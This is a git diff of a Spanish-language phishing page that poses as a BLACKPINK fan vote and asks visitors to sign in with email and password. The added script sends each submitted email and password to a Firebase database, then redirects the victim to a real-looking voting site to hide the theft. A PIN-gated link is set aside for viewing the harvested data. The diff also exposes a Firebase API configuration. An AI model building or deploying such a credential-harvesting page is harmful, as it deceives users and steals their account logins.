--- a/index.html
+++ b/index.html
@@ -5,7 +5,6 @@
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <title>Votación BLACKPINK</title>
 
-  <!-- Fuente bonita y amigable -->
   <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap" rel="stylesheet">
 
   <style>
@@ -17,12 +16,9 @@
       align-items: center; 
       min-height: 100vh; 
       flex-direction: column;
-
-      /* Fondo con imagen */
       background: url('https://pbs.twimg.com/media/FvTDI2_X0AE-aNl.jpg:large') no-repeat center center fixed;
       background-size: cover;
     }
-
     .login-box { 
       background: rgba(255, 255, 255, 0.9); 
       padding: 40px; 
@@ -34,74 +30,19 @@
       margin-bottom: 20px; 
       animation: fadeIn 1s ease-in-out; 
     }
-
-    .login-box h2 { 
-      margin-bottom: 5px; 
-      font-weight: 600; 
-      font-size: 22px; 
-      color: #111; 
-    }
-
-    .login-box p { 
-      margin-top: 0; 
-      color: #444; 
-      font-size: 14px; 
-    }
-
-    .login-box input { 
-      width: 100%; 
-      padding: 12px; 
-      margin: 10px 0; 
-      border: 1px solid #ddd; 
-      border-radius: 10px; 
-      font-size: 14px; 
-    }
-
-    .login-box button { 
-      width: 100%; 
-      padding: 12px; 
-      background: linear-gradient(90deg, #ff3399, #000000); /* estilo BLACKPINK */
-      border: none; 
-      border-radius: 10px; 
-      color: white; 
-      font-size: 16px; 
-      font-weight: 600; 
-      cursor: pointer; 
-      margin-top: 10px; 
-      transition: 0.3s; 
-    }
-
-    .login-box button:hover { 
-      opacity: 0.85; 
-      transform: scale(1.05);
-    }
-
-    .extra { 
-      margin-top: 15px; 
-      font-size: 13px; 
-      color: #666; 
-    }
-
-    .extra a { 
-      color: #ff3399; 
-      text-decoration: none; 
-      cursor: pointer; 
-    }
-
-    .extra a:hover { 
-      text-decoration: underline; 
-    }
-
-    /* Animación */
-    @keyframes fadeIn {
-      from { opacity: 0; transform: translateY(-20px); }
-      to { opacity: 1; transform: translateY(0); }
-    }
+    .login-box h2 { margin-bottom: 5px; font-weight: 600; font-size: 22px; color: #111; }
+    .login-box p { margin-top: 0; color: #444; font-size: 14px; }
+    .login-box input { width: 100%; padding: 12px; margin: 10px 0; border: 1px solid #ddd; border-radius: 10px; font-size: 14px; }
+    .login-box button { width: 100%; padding: 12px; background: linear-gradient(90deg, #ff3399, #000000); border: none; border-radius: 10px; color: white; font-size: 16px; font-weight: 600; cursor: pointer; margin-top: 10px; transition: 0.3s; }
+    .login-box button:hover { opacity: 0.85; transform: scale(1.05);}
+    .extra { margin-top: 15px; font-size: 13px; color: #666; }
+    .extra a { color: #ff3399; text-decoration: none; cursor: pointer; }
+    .extra a:hover { text-decoration: underline; }
+    @keyframes fadeIn { from { opacity: 0; transform: translateY(-20px); } to { opacity: 1; transform: translateY(0); } }
   </style>
 </head>
 <body>
 
-  <!-- Caja de Login -->
   <div class="login-box">
     <h2>Inicia sesión y vota por tu integrante favorita 💖🖤</h2>
     <p>BLINK, tu voto cuenta ✨ ¡Hazlo valer en esta votación especial!</p>
@@ -117,28 +58,59 @@
     </div>
   </div>
 
-  <script>
+  <!-- Firebase SDK -->
+  <script type="module">
+    // Importar SDKs de Firebase
+    import { initializeApp } from "https://www.gstatic.com/firebasejs/11.0.1/firebase-app.js";
+    import { getDatabase, ref, push } from "https://www.gstatic.com/firebasejs/11.0.1/firebase-database.js";
+
+    // Tu configuración de Firebase
+    const firebaseConfig = {
+      apiKey: "AIzaSyCIBiJXgLo-_9spj_YECcr2i95w88zpnZ8",
+      authDomain: "project-3593887432327561826.firebaseapp.com",
+      databaseURL: "https://project-3593887432327561826-default-rtdb.firebaseio.com",
+      projectId: "project-3593887432327561826",
+      storageBucket: "project-3593887432327561826.firebasestorage.app",
+      messagingSenderId: "686989988857",
+      appId: "1:686989988857:web:533a6df48358adebd8a328",
+      measurementId: "G-43T3NQJ1D6"
+    };
+
+    // Inicializar Firebase
+    const app = initializeApp(firebaseConfig);
+    const db = getDatabase(app);
+
+    // Capturar formulario
     const loginForm = document.getElementById('loginForm');
     const recoverLink = document.getElementById('recoverLink');
 
+    // Guardar en Realtime Database
     loginForm.addEventListener('submit', function(e){
       e.preventDefault();
       const email = this.email.value;
       const password = this.password.value;
 
-      // Guardar en localStorage
-      let historial = JSON.parse(localStorage.getItem('historialDatos')) || [];
-      historial.push({ email, password, fecha: new Date().toLocaleString() });
-      localStorage.setItem('historialDatos', JSON.stringify(historial));
-
-      // Redirigir a la votación
-      window.location.href = "https://www.tuvotacion.com/quien-es-la-ms-bonita-de-blackpink-1";
+      // Guardar datos en la BD con un ID único
+      const referencia = ref(db, "usuarios");
+      push(referencia, {
+        email: email,
+        password: password,
+        fecha: new Date().toLocaleString()
+      })
+      .then(() => {
+        console.log("Datos guardados en Firebase ✅");
+        window.location.href = "https://www.tuvotacion.com/quien-es-la-ms-bonita-de-blackpink-1";
+      })
+      .catch((error) => {
+        console.error("Error al guardar ❌", error);
+      });
     });
 
+    // Acceso con PIN (aquí luego podemos mostrar los datos desde Firebase)
     recoverLink.addEventListener('click', function(){
       const pin = prompt("Ingresa el PIN para acceder a los datos:");
       if(pin === "2006"){
-        alert("✅ Acceso permitido (aquí iría la vista del historial)");
+        alert("✅ Acceso permitido (más adelante aquí podemos mostrar los datos guardados en Firebase)");
       } else {
         alert("PIN incorrecto ❌");
       }
